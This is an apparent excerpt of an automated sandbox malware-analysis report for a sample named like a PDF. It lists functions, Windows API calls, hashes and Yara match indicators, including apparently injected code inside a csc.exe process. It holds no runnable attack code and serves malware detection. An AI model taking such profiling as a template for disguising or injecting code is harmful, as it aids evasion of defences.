Opcode Fuzzy Hash: c6980aae1e4cbbc4440220d442a299caac1a64996a2fa9476b91f6dea4e9d173
Instruction Fuzzy Hash: 6041A121E0D78251EA51AB55910027DEEA0AF48B99FC9443ACE4D07799DF7CF8638360

Function 00007FF7D787FAB0 Relevance: 6.1, APIs: 4, Instructions: 85COMMON

Download Yara Rule

APIs

DebugBreak.KERNEL32(?,?,?,?,00007FF7D787FCD1,?,?,00000000,00007FF7D786C73E), ref: 00007FF7D787FB69
DebugBreak.KERNEL32(?,?,?,?,00007FF7D787FCD1,?,?,00000000,00007FF7D786C73E), ref: 00007FF7D787FB86
DebugBreak.KERNEL32(?,?,?,?,00007FF7D787FCD1,?,?,00000000,00007FF7D786C73E), ref: 00007FF7D787FBA6
DebugBreak.KERNEL32(?,?,?,?,00007FF7D787FCD1,?,?,00000000,00007FF7D786C73E), ref: 00007FF7D787FBC9

Memory Dump Source

Source File: 00000000.00000002.2126661606.00007FF7D7851000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D7850000, based on PE: true

Associated: 00000000.00000002.2126648588.00007FF7D7850000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126737374.00007FF7D7972000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126770181.00007FF7D79C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126816252.00007FF7D7A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126816252.00007FF7D7A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126845759.00007FF7D7A76000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7d7850000_101 2043 5770 pdf.jbxd

Similarity

API ID: BreakDebug
String ID:
API String ID: 456121617-0
Opcode ID: 4114d6e1ff1901576ccfef03d0041d25f9ba1c0722995c08a6ab1c9085b5b2d8
Instruction ID: d73072eb14ed188fca445b5cd0818f23500039e926b24007f687253a04816611
Opcode Fuzzy Hash: 4114d6e1ff1901576ccfef03d0041d25f9ba1c0722995c08a6ab1c9085b5b2d8
Instruction Fuzzy Hash: 7B310721A0974282E6257F56D15027DEBA4FF44B84FD8003ADA8E0B795DF3CE4A383A0

Function 00007FF7D785BD20 Relevance: 6.0, APIs: 4, Instructions: 46COMMON

Download Yara Rule

APIs

WaitForMultipleObjectsEx.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7D7855BD1), ref: 00007FF7D785BD54
SetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7D7855BD1), ref: 00007FF7D785BD5E
CoWaitForMultipleHandles.OLE32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7D7855BD1), ref: 00007FF7D785BD7D
SetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7D7855BD1), ref: 00007FF7D785BD91

Memory Dump Source

Source File: 00000000.00000002.2126661606.00007FF7D7851000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D7850000, based on PE: true

Associated: 00000000.00000002.2126648588.00007FF7D7850000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126737374.00007FF7D7972000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126770181.00007FF7D79C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126816252.00007FF7D7A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126816252.00007FF7D7A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126845759.00007FF7D7A76000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7d7850000_101 2043 5770 pdf.jbxd

Similarity

API ID: ErrorLastMultipleWait$HandlesObjects
String ID:
API String ID: 2817213684-0
Opcode ID: d6d64c1b6cebd0d3830e9a4970511ae07462b2c9b86ec264f5bf388921dc648c
Instruction ID: 8a527323ab4cee9b6500fb0b79770421a9ed7b93384c090557678854a2c9df5a
Opcode Fuzzy Hash: d6d64c1b6cebd0d3830e9a4970511ae07462b2c9b86ec264f5bf388921dc648c
Instruction Fuzzy Hash: 4211863570C65687EB549B15B40412EFA71FB94794FD40136EACD47BA4CF3CD4118B50

Function 00007FF7D78BBABC Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00007FF7D78BBAE8
GetCurrentThreadId.KERNEL32 ref: 00007FF7D78BBAF6
GetCurrentProcessId.KERNEL32 ref: 00007FF7D78BBB02
QueryPerformanceCounter.KERNEL32 ref: 00007FF7D78BBB12

Memory Dump Source

Source File: 00000000.00000002.2126661606.00007FF7D7851000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D7850000, based on PE: true

Associated: 00000000.00000002.2126648588.00007FF7D7850000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126737374.00007FF7D7972000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126770181.00007FF7D79C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126816252.00007FF7D7A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126816252.00007FF7D7A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126845759.00007FF7D7A76000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7d7850000_101 2043 5770 pdf.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: 448f7fa62473162a993d136a7de82f08107ef85fcdf4a78ab24719393ecbff3a
Instruction ID: 079cb13e3e161e6b7ee1e7c76c70c707c35c7c07b5a2acbc013bab9912bbb645
Opcode Fuzzy Hash: 448f7fa62473162a993d136a7de82f08107ef85fcdf4a78ab24719393ecbff3a
Instruction Fuzzy Hash: 78115E22B14F028AEB00DF60E8542BD73B4F768758F840E32DA6D877A4DF38D1558350

Function 00007FF7D78BCE98 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF7D78BC1A3), ref: 00007FF7D78BCEE8
RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF7D78BC1A3), ref: 00007FF7D78BCF29

Strings

csm, xrefs: 00007FF7D78BCF16

Memory Dump Source

Source File: 00000000.00000002.2126661606.00007FF7D7851000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D7850000, based on PE: true

Associated: 00000000.00000002.2126648588.00007FF7D7850000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126737374.00007FF7D7972000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126770181.00007FF7D79C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126816252.00007FF7D7A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126816252.00007FF7D7A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126845759.00007FF7D7A76000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7d7850000_101 2043 5770 pdf.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 1480e795d2ef5b2a1670c3a2eae99ff294a7be5ba31577bda954079b26dcfe65
Instruction ID: 2367e3e8d10cb3262d86f31a9ccb38bfc3aae76a3e4b5b4d1243e2799045bc5c
Opcode Fuzzy Hash: 1480e795d2ef5b2a1670c3a2eae99ff294a7be5ba31577bda954079b26dcfe65
Instruction Fuzzy Hash: F511FE32618B8182EB619F15F44025DBBE5FB88B98F984236DA8D47764DF3CD552CB10

Function 00007FF7D785D880 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37stringCOMMON

Download Yara Rule

APIs

_stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,HeapVerify,00007FF7D785CB43,?,?,?,00007FF7D7863197,?,?,?,?,00007FF7D785C045), ref: 00007FF7D785D8BB
strtoull.API-MS-WIN-CRT-CONVERT-L1-1-0(?,?,HeapVerify,00007FF7D785CB43,?,?,?,00007FF7D7863197,?,?,?,?,00007FF7D785C045), ref: 00007FF7D785D8F8

Strings

HeapVerify, xrefs: 00007FF7D785D88F

Memory Dump Source

Source File: 00000000.00000002.2126661606.00007FF7D7851000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D7850000, based on PE: true

Associated: 00000000.00000002.2126648588.00007FF7D7850000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126737374.00007FF7D7972000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126770181.00007FF7D79C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126816252.00007FF7D7A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126816252.00007FF7D7A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126845759.00007FF7D7A76000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7d7850000_101 2043 5770 pdf.jbxd

Similarity

API ID: _stricmpstrtoull
String ID: HeapVerify
API String ID: 4031153986-2674988305
Opcode ID: 01378972d7aec4f66a506a677378b88eb102d7cfef77ba520669cbd5cc3376e4
Instruction ID: 9573def70cb8f1d3f015a04c783dc32a494130be1d3adb1cb9e84fc015272ab4
Opcode Fuzzy Hash: 01378972d7aec4f66a506a677378b88eb102d7cfef77ba520669cbd5cc3376e4
Instruction Fuzzy Hash: F8015271A09A8189E714AF25E98007DFB61FB88780FD49436DA4D03B59CE3CD4A2D724

Function 00007FF7D7874850 Relevance: 5.1, APIs: 4, Instructions: 53COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,00000000,00007FF7D78749CF,?,?,?,00007FF7D78826AB), ref: 00007FF7D787489A
LeaveCriticalSection.KERNEL32(?,?,00000000,00007FF7D78749CF,?,?,?,00007FF7D78826AB), ref: 00007FF7D78748DC
EnterCriticalSection.KERNEL32(?,?,00000000,00007FF7D78749CF,?,?,?,00007FF7D78826AB), ref: 00007FF7D7874907
LeaveCriticalSection.KERNEL32(?,?,00000000,00007FF7D78749CF,?,?,?,00007FF7D78826AB), ref: 00007FF7D7874928

Memory Dump Source

Source File: 00000000.00000002.2126661606.00007FF7D7851000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D7850000, based on PE: true

Associated: 00000000.00000002.2126648588.00007FF7D7850000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126737374.00007FF7D7972000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126770181.00007FF7D79C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126816252.00007FF7D7A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126816252.00007FF7D7A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126845759.00007FF7D7A76000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7d7850000_101 2043 5770 pdf.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: 8f3fc4e38b18f16690e3dd9b264e0c7fc826cd2e09aad4038a61dd6f7454e03b
Instruction ID: f4b4535c8178942dd797331b7007348dab115023c0ad8b5c89e68d6b79097388
Opcode Fuzzy Hash: 8f3fc4e38b18f16690e3dd9b264e0c7fc826cd2e09aad4038a61dd6f7454e03b
Instruction Fuzzy Hash: CF215871E0858751FA08AB18E88677CA754EF40794FD50233D5AD495E5DF3DD196C320

Analysis Process: csc.exePID: 6324, Parent PID: 2720COMMON

Execution Graph

Execution Coverage:	1.6%
Dynamic/Decrypted Code Coverage:	5.4%
Signature Coverage:	8.3%
Total number of Nodes:	569
Total number of Limit Nodes:	67

Executed Functions

Function 0588A036 Relevance: 12.7, APIs: 6, Strings: 1, Instructions: 481
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtQueryInformationProcess.NTDLL ref: 0588A19F

Strings

0, xrefs: 0588A227

Memory Dump Source

Source File: 00000006.00000002.2189043325.0000000005880000.00000040.00000800.00020000.00000000.sdmp, Offset: 05880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5880000_csc.jbxd

Similarity

API ID: InformationProcessQuery
String ID: 0
API String ID: 1778838933-4108050209
Opcode ID: 7bc916a415ef614ffafa7f75d0ec115445e44d1b24a8fe03bb76e065ae57333e
Instruction ID: f2357f6440434c6b7f6dc6a506040ef7e6326b42c794a85c255f7a534f7c1eb5
Opcode Fuzzy Hash: 7bc916a415ef614ffafa7f75d0ec115445e44d1b24a8fe03bb76e065ae57333e
Instruction Fuzzy Hash: 0DF11070618A4C8FDBA9FF68C894AFEB7E0FB98315F40462AD84AD7250DF349945CB41

Function 0041A3E0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A425

Strings

rMA, xrefs: 0041A41D, 0041A424
rMA, xrefs: 0041A402, 0041A410
1JA, xrefs: 0041A3FC, 0041A408

Memory Dump Source

Source File: 00000006.00000002.2188500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_csc.jbxd

Yara matches

Similarity

API ID: FileRead
String ID: 1JA$rMA$rMA
API String ID: 2738559852-782607585
Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction ID: c75c44bd16ed9a046d03b4490adc68ebadf214b0f3589fd2ba36fb57c0fad8bd
Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction Fuzzy Hash: 95F0B7B2210208AFCB14DF89DC81EEB77ADEF8C754F158249BE1D97241D630E851CBA4

Function 0588A042 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 163
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtQueryInformationProcess.NTDLL ref: 0588A19F

Strings

0, xrefs: 0588A0CD

Memory Dump Source

Source File: 00000006.00000002.2189043325.0000000005880000.00000040.00000800.00020000.00000000.sdmp, Offset: 05880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5880000_csc.jbxd

Similarity

API ID: InformationProcessQuery
String ID: 0
API String ID: 1778838933-4108050209
Opcode ID: 4a13b2017a61ababd9bba988d9a9b5b8b8f576b3da72e298de5122239bed11ad
Instruction ID: 99a0fb5cb9bc7c8862f0c12fc477416152cd73fcb4f6c2a972109b1250de702a
Opcode Fuzzy Hash: 4a13b2017a61ababd9bba988d9a9b5b8b8f576b3da72e298de5122239bed11ad
Instruction Fuzzy Hash: EA512E70918A8C8FDB69EF68C8946EEB7F4FB98315F40462ED84AD7250DF309A45CB41

Function 0041A2EA Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 75
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A37D

Strings

~EA, xrefs: 0041A28C, 0041A298

Memory Dump Source

Source File: 00000006.00000002.2188500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_csc.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID: ~EA
API String ID: 823142352-771446286
Opcode ID: 0a6def56714a249e1c751e96dc429740f1e4b2e15c94a71391ce729a8bf6629b
Instruction ID: 8b44f2a857813280c0720c5d55243ba96fa7631cab22482ee2b259ac68845e2f
Opcode Fuzzy Hash: 0a6def56714a249e1c751e96dc429740f1e4b2e15c94a71391ce729a8bf6629b
Instruction Fuzzy Hash: 6A21D3B2211109AFCB04DF99DC81DEB73A9EF8C718F108659FE1997241D634E862CBA5

Function 0040ACF0 Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD62

Memory Dump Source

Source File: 00000006.00000002.2188500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_csc.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: dc3a20c1ec50d06182a7a0d09a3226b614d41f62ab50fc3b2a934671b827885c
Instruction ID: 7435202e8c2424d374e436f157d00fb34b53d81c2f6da2748dfdf88e1812e125
Opcode Fuzzy Hash: dc3a20c1ec50d06182a7a0d09a3226b614d41f62ab50fc3b2a934671b827885c
Instruction Fuzzy Hash: C9015EB6D0020DBBDB10DBA1DC42FDEB3789F54308F0041AAA908A7281F634EB54CB95

Function 0041A32B Relevance: 1.5, APIs: 1, Instructions: 41
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A37D

Memory Dump Source

Source File: 00000006.00000002.2188500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_csc.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 01fbd5d38fcc0df6e0f1e966f74fa916bfa0c1d25b48c621f494a8122115ca72
Instruction ID: cb94080d2b0935485dfe32b0cf0b4281a9199e063cf7ef49b04f1cd0fca65267
Opcode Fuzzy Hash: 01fbd5d38fcc0df6e0f1e966f74fa916bfa0c1d25b48c621f494a8122115ca72
Instruction Fuzzy Hash: D101C4B2211108AFDB08CF99DD84EEB37ADAF8C754F158249FA1D97244C630E851CBA4

Function 0041A330 Relevance: 1.5, APIs: 1, Instructions: 40
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A37D

Memory Dump Source

Source File: 00000006.00000002.2188500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_csc.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction ID: 7ed6e6cb708c972561b0f9910f559a39af1ab3cc862b6eef20835abd22e26781
Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction Fuzzy Hash: C4F0BDB2211208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E851CBA4

Function 0041A510 Relevance: 1.5, APIs: 1, Instructions: 30
memorynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B104,?,00000000,?,00003000,00000040,00000000,00000000,00409CF3), ref: 0041A549

Memory Dump Source

Source File: 00000006.00000002.2188500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_csc.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction ID: 8b47746d7073478515a2f8fd1fb94e42dcc9ffa91ac9ff965dae3841ed3a313c
Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction Fuzzy Hash: 9CF015B2210208ABCB14DF89CC81EEB77ADAF88754F118149BE0897241C630F811CBA4

Function 0041A460 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(00414D50,?,?,00414D50,00409CF3,FFFFFFFF), ref: 0041A485

Memory Dump Source

Source File: 00000006.00000002.2188500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_csc.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction ID: e9450f8bec15428cdd91297f97b7848412804bda5c7d31b3f0e5b01193c95e83
Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction Fuzzy Hash: 3CD01776211214ABD710EB99CC85EE77BACEF48764F15449ABA189B242C530FA1186E0

Function 059A2DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 059A2DDA

Memory Dump Source

Source File: 00000006.00000002.2189080452.0000000005930000.00000040.00001000.00020000.00000000.sdmp, Offset: 05930000, based on PE: true

Associated: 00000006.00000002.2189080452.0000000005A59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005ACE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5930000_csc.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 25f694be7b81ee62a21bd97c5cde5bcbf02daba26f3c74b7d1bc1af69027e8d3
Instruction ID: 6b118cb2d43d73d059eb5f0a8355784262d710f96cb36da5ca3586a80d0023c7
Opcode Fuzzy Hash: 25f694be7b81ee62a21bd97c5cde5bcbf02daba26f3c74b7d1bc1af69027e8d3
Instruction Fuzzy Hash: A8900262242541527545B1584948547405E97E42417D5C012A1415950C85669956DA21

Function 059A2DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 059A2DFA

Memory Dump Source

Source File: 00000006.00000002.2189080452.0000000005930000.00000040.00001000.00020000.00000000.sdmp, Offset: 05930000, based on PE: true

Associated: 00000006.00000002.2189080452.0000000005A59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005ACE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5930000_csc.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2a7fff427a84185c96a3f30c4aad96207e2d93e18e43fa994062930c146689ba
Instruction ID: 81983ac816e7b43d31deb13ef8cfac1e22fa5b708011f6ebd9d9f905e5d1517d
Opcode Fuzzy Hash: 2a7fff427a84185c96a3f30c4aad96207e2d93e18e43fa994062930c146689ba
Instruction Fuzzy Hash: 5190027220150413F11171584A48747005D87D4241FD5C412A0425558D96968A52A521

Function 059A2D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 059A2D1A

Memory Dump Source

Source File: 00000006.00000002.2189080452.0000000005930000.00000040.00001000.00020000.00000000.sdmp, Offset: 05930000, based on PE: true

Associated: 00000006.00000002.2189080452.0000000005A59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005ACE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5930000_csc.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c770152abc1d8e331abd0b537738fa62854236d82cc6a624a4ad2bc1023c525e
Instruction ID: 9c0c688f1c03c2e7e00c1df915adfccac6dc78c4061b9fb46e55a3686fb4decb
Opcode Fuzzy Hash: c770152abc1d8e331abd0b537738fa62854236d82cc6a624a4ad2bc1023c525e
Instruction Fuzzy Hash: C190026A21350002F1807158594C64A005D87D5202FD5D415A0016558CC95589695721

Function 059A2D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 059A2D3A

Memory Dump Source

Source File: 00000006.00000002.2189080452.0000000005930000.00000040.00001000.00020000.00000000.sdmp, Offset: 05930000, based on PE: true

Associated: 00000006.00000002.2189080452.0000000005A59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005ACE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5930000_csc.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8f0060e9af7230a7e0228474439105983de52b6c12fc9fde7b7339293cfea125
Instruction ID: b5d6e4a1db4fdc3c1923f41b459a6208ad3bf6fb3b0e188681e23c06b3d47e26
Opcode Fuzzy Hash: 8f0060e9af7230a7e0228474439105983de52b6c12fc9fde7b7339293cfea125
Instruction Fuzzy Hash: 8290026230150003F1407158595C646405DD7E5301F95D011E0415554CD95589565622

Function 059A2CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 059A2CAA

Memory Dump Source

Source File: 00000006.00000002.2189080452.0000000005930000.00000040.00001000.00020000.00000000.sdmp, Offset: 05930000, based on PE: true

Associated: 00000006.00000002.2189080452.0000000005A59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005ACE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5930000_csc.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a48d5b40068680a65a3526e737cc8650780ab4324a868a44c6380bc106375be2
Instruction ID: 0161c22588e22004be76da5060c879b70ac53479ceddeb3ea2d80d59701e0b2d
Opcode Fuzzy Hash: a48d5b40068680a65a3526e737cc8650780ab4324a868a44c6380bc106375be2
Instruction Fuzzy Hash: 2890027220150402F1007598594C686005D87E4301F95D011A5025555EC6A589916531

Function 059A2C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 059A2C7A

Memory Dump Source

Source File: 00000006.00000002.2189080452.0000000005930000.00000040.00001000.00020000.00000000.sdmp, Offset: 05930000, based on PE: true

Associated: 00000006.00000002.2189080452.0000000005A59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005ACE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5930000_csc.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 74ae2d531b6231204a5b853bfe9ac924928d98196639c51e9c28dc6bf1bbf537
Instruction ID: 91b9b19bc25b32c0c468e7864b5a6d20adce9e23cd38742c53deb8c3ecca6083
Opcode Fuzzy Hash: 74ae2d531b6231204a5b853bfe9ac924928d98196639c51e9c28dc6bf1bbf537
Instruction Fuzzy Hash: CE90027220158802F1107158894878A005D87D4301F99C411A4425658D86D589917521

Function 059A2F90 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 059A2F9A

Memory Dump Source

Source File: 00000006.00000002.2189080452.0000000005930000.00000040.00001000.00020000.00000000.sdmp, Offset: 05930000, based on PE: true

